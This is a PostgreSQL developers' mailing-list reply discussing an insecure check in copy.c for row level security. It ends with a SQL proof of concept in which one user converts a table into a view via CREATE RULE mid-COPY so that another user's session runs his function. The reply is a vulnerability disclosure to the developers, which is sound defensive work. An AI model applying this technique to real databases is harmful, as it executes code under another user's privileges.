Re: copy.c handling for RLS is insecure

От Noah Misch
Тема Re: copy.c handling for RLS is insecure
Дата
Re: copy.c handling for RLS is insecure  (Stephen Frost <sfrost@snowman.net>)
Список pgsql-hackers
On Tue, Dec 02, 2014 at 11:32:27AM -0500, Stephen Frost wrote:
> * Robert Haas (robertmhaas@gmail.com) wrote:
> > On Thu, Nov 27, 2014 at 2:03 AM, Stephen Frost <sfrost@snowman.net> wrote:
> > > Alright, I've done the change to use the RangeVar from CopyStmt, but
> > > also added a check wherein we verify that the relation's OID returned
> > > from the planned query is the same as the relation's OID that we did the
> > > RLS check on- if they're different, we throw an error.  Please let me
> > > know if there are any remaining concerns.

Here is the check in question (added in commit 143b39c):
    plan = planner(query, 0, NULL);
    /*     * If we were passed in a relid, make sure we got the same one back     * after planning out the query.  It's
possiblethat it changed     * between when we checked the policies on the table and decided to     * use a query and
now.    */    if (queryRelId != InvalidOid)    {        Oid            relid = linitial_oid(plan->relationOids);

        /*         * There should only be one relationOid in this case, since we         * will only get here when we
havechanged the command for the         * user from a "COPY relation TO" to "COPY (SELECT * FROM         * relation)
TO",to allow row level security policies to be         * applied.         */
Assert(list_length(plan->relationOids)== 1);

        if (relid != queryRelId)            ereport(ERROR,
(errcode(ERRCODE_OBJECT_NOT_IN_PREREQUISITE_STATE),           errmsg("relation referenced by COPY statement has
changed")));   }

> > That's clearly an improvement, but I'm not sure it's water-tight.
> > What if the name that originally referenced a table ended up
> > referencing a view?  Then you could get
> > list_length(plan->relationOids) != 1.
>
> I'll test it out and see what happens.  Certainly a good question and
> if there's an issue there then I'll get it addressed.

Yes, it can be made to reference a view and trip the assertion.

> > (And, in that case, I also wonder if you could get
> > eval_const_expressions() to do evil things on your behalf while
> > planning.)
>
> If it can be made to reference a view then there's an issue as the view
> might include a function call itself which is provided by the attacker..

Indeed.  As the parenthetical remark supposed, the check happens too late to
prevent a security breach.  planner() has run eval_const_expressions(),
executing code of the view owner's choosing.

> Clearly, if we found a relation originally then we need that same
> relation with the same OID after the conversion to a query.

That is necessary but not sufficient.  CREATE RULE can convert a table to a
view without changing the OID, thereby fooling the check.  Test procedure:

-- as superuser (or createrole)
create user blackhat;
create user alice;

-- as blackhat
begin;
create table exploit_rls_copy (c int);
alter table exploit_rls_copy enable row level security;
grant select on exploit_rls_copy to public;
commit;

-- as alice
-- first, set breakpoint on BeginCopy
copy exploit_rls_copy to stdout;

-- as blackhat
begin;
create or replace function leak() returns int immutable as $$beginraise notice 'in leak()'; return 7; end$$ language
plpgsql;
create rule "_RETURN" as on select to exploit_rls_copy do insteadselect leak() as c from (values (0)) dummy;
commit;

-- Release breakpoint.  leak() function call happens.  After that, assertion
-- fires if enabled.  ERROR does not fire in any case.